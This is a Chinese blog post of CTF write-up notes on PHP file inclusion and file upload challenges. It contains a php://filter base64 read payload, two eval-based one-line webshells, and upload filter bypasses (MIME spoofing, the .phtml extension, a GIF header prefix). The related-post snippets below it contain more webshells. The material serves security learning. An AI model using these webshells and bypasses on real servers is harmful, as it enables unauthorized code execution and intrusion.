文件包含&&文件上传(1)——CTF写题笔记

已于 2024-09-07 16:07:06 修改
阅读量390 收藏 4
点赞数 5
分类专栏: CTF写题 文章标签: 笔记 学习
于 2024-09-05 22:19:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_82847928/article/details/141940611
版权

目录

[ACTF2020 新生赛]Include

[极客大挑战 2019]Secret File

[极客大挑战 2019]Upload

[ACTF2020 新生赛]Include

刚进题目发现一个链接,名称为tip。点入链接挑战到新的页面。

页面显示“Can you find out the flag?",并且发现使用了文件包含?file=flag.php。

考虑有部分内容被注释掉而无法显示在页面上。

使用php伪协议将文件内容使用base64编码后输出

?file=php://filter/read=convert.base64-encode/resource=flag.php

进行解码

得到了被注释掉的flag

[极客大挑战 2019]Secret File

一点进去显示出一个诡异的页面。

页面上没有什么信息,F12打开开发者模式看一下页面源文件。

看到了./Archive_room.php的文件路径,直接去访问。

得到如上页面,有链接SECRET链接到action.php文件,直接访问。

访问之后居然直接跳转到了end.php文件,考虑使用burpsuite抓包,再使用repeater模块。

得到了文件名为secr3t.php。直接访问。

回显了如上页面,显然上面这段代码说明了当前的文件使用了include函数,可以去执行文件包含,并且明确告知了我们需要访问flag.php。strstr函数对我们的查询没有过滤,直接文件包含。

/secr3t.php?file=flag.php

回显了如上页面,并未显示出flag,那我我们使用老方法,用php伪协议将文件内容base64编码输出。

得到编码,页面显示不下,F12查看全部内容直接解码。

得到flag。

[极客大挑战 2019]Upload

写马

<?php @eval($_REQUEST["cmd"]);?>

直接尝试上传hack.php。

回显不是图片类型,直接上bp

尝试MIME绕过,image/jpeg

回显

可能对文件扩展名也有过滤,修改为hack.phtml。(php3,php4,php5和phtml都会将文件当作PHP解析)

回显

看来对文件内容也存在过滤。我们用jsp语法绕过对'<?'的检测

<script language="php">@eval($_REQUEST["cmd"])</script>

回显如上,猜测还有可能对文件头有过滤,我们尝试修改一下文件头,做一个图片马。

可以使用010editor进行操作。或者也可以在文件前端加上“GIF81a”去绕过对文件头的过滤。

访问目录/upload/hack.phtml。

发现文件成功被解析。直接上蚁剑

成功找到flag。

Double evil
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
[HXPCTF 2021]includer‘s revenge
rev1ve的博客
11-12 437
这种情况下我们还是可以在对应的 /proc/PID/fd 下找到我们删除的文件 ,虽然显示是被删除了,但是我们依然可以读取到文件内容,所以我们可以直接用php 进行文件包含。但是最后一个问题就是,既然我们要去包含 Nginx 进程下的文件,我们就需要知道对应的 pid 以及 fd 下具体的文件名,怎么才能获取到这些信息呢?这时我们就需要用到文件读取进行获取 proc 目录下的其他文件了,这里我们只需要本地搭个 Nginx 进程并启动,对比其进程的 proc 目录文件与其他进程文件区别就可以了。
CTF文件上传(知识点+例题)(1)
qq_53099119的博客
03-23 5619
有的站点会出现仅进行了前端校验的情况(一切在前端做的安全防护,都是耍流氓),由于前端页面的源码是我们可以随意更改的,因此可以通过找到进行过滤的指令,更改成我们想要的功能即可。假设接下来就可以上传一个名为1.png的木马文件,植入后门,将其上传后,该文件虽文件后缀名为png,但会被当作php类型的文件进行解析,其中的一句话木马也能够被正常执行。因此,通过使用.user.ini,我们可以任意指定包含一个文件,这个文件可以是我们自己上传的木马文件,从而通过该木马文件提供后门来获取当前服务器的webshell。
CTF-文件上传文件包含)总结
最新发布
2302_78903258的博客
07-21 1491
攻击者在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,然后使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)。php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中,正常情况下,PHP会将用户输入的文件名进行resolve,转换成标准的绝对路径,这个转换的过程会将…来实现的,它会检查左侧的表达式是否为 null,如果是则使用右侧的默认值。以及 fd 怎么办呢?
文件上传漏洞CTF笔记
捡糖的echo
10-12 5587
参加i春秋训练营,根据大佬写的write  up,以下为过程中个人笔记 访问赛题 URL, 返回包如下 HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Thu, 28 Dec 2017 08:19:49 GMT Content-Type: text/html Content-Length: 87 Connection: keep-alive X-Powe...
CTF实战练习:文件上传漏洞+文件包含漏洞
烟雨天青色
08-06 1万+
BugkuCTF:文件包含2 CTF实战练习:http://120.78.xx.xxx:8013 这道题目看起来又像是跟前一道题是差不多的样子,继续先查看index.php里面的内容: 哎~这次好像显示的并不是base64编码的内容,但是感觉起来这个信息一点用都没有,第二步,查看网页源代码: 从网页源代码里我们可以看出在JS脚本里包含了一个html页面,我们现在来访问一下这个页...
CTF文件上传题目整理总结
xiaotaode2012的专栏
08-16 1万+
0X00说在前面的话 CTF中或多或少都有点文件上传的题目,而这个又是最好整理的,变化的方式不是很多(至少到目前为止我没有发现太多的姿势。。。。),随意就先整理这个吧。 0x01文件上传绕过的主要姿势有: A:基于前台JS的验证,这个 不要说就是firebug下修改一下JS文件就绕过了 B:基于文件后缀名的绕过,这里面的主要姿势有:利用后缀名大小写混用绕过、空格或者
php 变量覆盖 ctf,CTF-代码审计(1)——parse_str()变量覆盖
weixin_34801390的博客
03-27 772
题目连接:http://222.18.158.226:7000/iscc.php考点:parse_str()变量覆盖代码:PHP知识点:1.parse_url()参照网址:https://www.php.net/manual/zh/function.parse-url.php2.$_SERVER[]参考网址:https://php.net/manual/zh/reserved.variables....
CTF训练笔记(三)- SMB信息泄露
morrino的博客
02-05 1680
大量搜索各种信息,尝试利用各种途径拿到shell进而提权。[CTF训练笔记系列 - 快速导航](https://blog.csdn.net/morrino/article/details/116036237)
攻防世界题目练习——Web难度1(二)_&lt; php highlight_file(__file__); include(&quot;(1)
2301_79054215的博客
04-20 867
是Linux中的一个特殊变量,它代表了当前的字段分隔符,它的默认值是空格、制表符和换行符,当输入命令时,会以空格、制表符或换行符作为分隔符,将输入的内容分割成不同的字段,每个字段将作为命令的一个参数进行解析和执行。现在我们知道了waf函数过滤的有哪些字符或字符串,我们要避免直接输入这些关键词,但是有些字符在我们查找flag的过程中不可避免地会用到,因此我们对它们进行绕过,绕过的方式有如下几种。函数进行了匹配,第一个参数是给定的用来模式匹配的正则表达式,第二个参数是输入的要匹配的字符串。
[网络安全自学篇] 八十.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)
杨秀璋的专栏
05-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。这篇文章将介绍WHUCTF部分题目,第一次参加CTF,还是能学到很多东西。下面分享四个我完成的WEB类型题目的解题过程,希望对您有所帮助。本来感觉能做出6道题目,但有两道题卡在某个点,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬
CTF文件上传
qq_45086218的博客
03-22 4054
文章目录一句话木马文件类型验证修改文件名修改文件类型user.iniauto_append_file和auto_prepend_file 本文以ctf.show网站题目为例,总结ctf中的文件上传姿势 一句话木马 <?php @eval($_POST['shell']);?> 文件类型验证 文件上传题多数只能上传图片,即jpg/png格式文件 修改文件名 Content-Disposition: form-data; name="file"; filename="shell.png" 将s
i春秋 “百度杯”CTF比赛 九月场 Upload
include_heqile的博客
09-07 577
https://www.ichunqiu.com/battalion?t=1 这道题其实很简单,就是一道文件上传题,他没有对文件类型作任何过滤,但是去过滤了文件内容php,字符串被过滤掉了,当我们上传&amp;amp;lt;?phpsystem($_GET[&amp;quot;cmd&amp;quot;]);之后,点击上传成功,查看页面源代码,会发现我们的文件被修改成了system($_GET[&amp;quot;cmd&amp;quot;]);,自然而然的我们就会
CTF学习笔记——Upload
Obs_cure的博客
02-08 2585
一、 1.题目 2.解题步骤 3.总结 4.参考资料
CTF - WEB - upload
跳房子的博客
10-21 2843
$name = $_GET['name']; $url = $_SERVER['QUERY_STRING']; if (isset($name)){ if (preg_match('/\.|etc|var|tmp|usr/i', $url)){ echo("hacker!"); } else{ if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
CTF文件上传文件包含总结
None安全团队
12-15 4586
文件上传】 一、前端检查 前端对文件后缀进行检查,该种通过抓包修改数据包即可解决 二、文件名检查 (1)大小写绕过 在windows下,可以将后缀写为pHp (2)unicode 当目标存在json_decode且检查在json_decode之前,可以将php写为\u0070hp (3)php3457 该项为apache专属 关键点在/etc/apache2/mods-available/php5.6.conf这个文件,满足.+\.ph(p[3457]?|t|tml)$,都会被当.
CTF文件包含漏洞总结
Lethe's Blog
02-13 5万+
CTF文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否...
BUUCTF文件上传文件包含漏洞
YIHAHUHA的博客
11-10 1549
看到题目的第一感觉就是文件包含漏洞 再往下看看还有啥有用的信息 看来不可以直接查看上目录的文件 上传一个脚本试试 后缀和文件名都给改了 打开看看会不会运行 居然就可以运行了?? 还以为会有文件头识别啥的~~(以为要做一个图片马嘞) 简单的文件上传文件包含漏洞(主要是文件包含漏洞) 文件包含的大致解题思路就是上传一个 恶意的脚本上去,然后想办法在你访问这个脚本文件时让这个脚本可以在后端运行,从而...
CTF-练习平台 Web writeup By Assassin [暂时完结]
热门推荐
Assassin
04-06 7万+
签到题 web2 文件上传测试经典的题目,用burp抓包得到如下 然后我们更改一下上传路径然后用%00截断一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"计算题改一下浏览器中的text的长度Web3进去一直弹框,没完没了…直接禁用了F12看源码,发现有一个<!--KEY&#
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值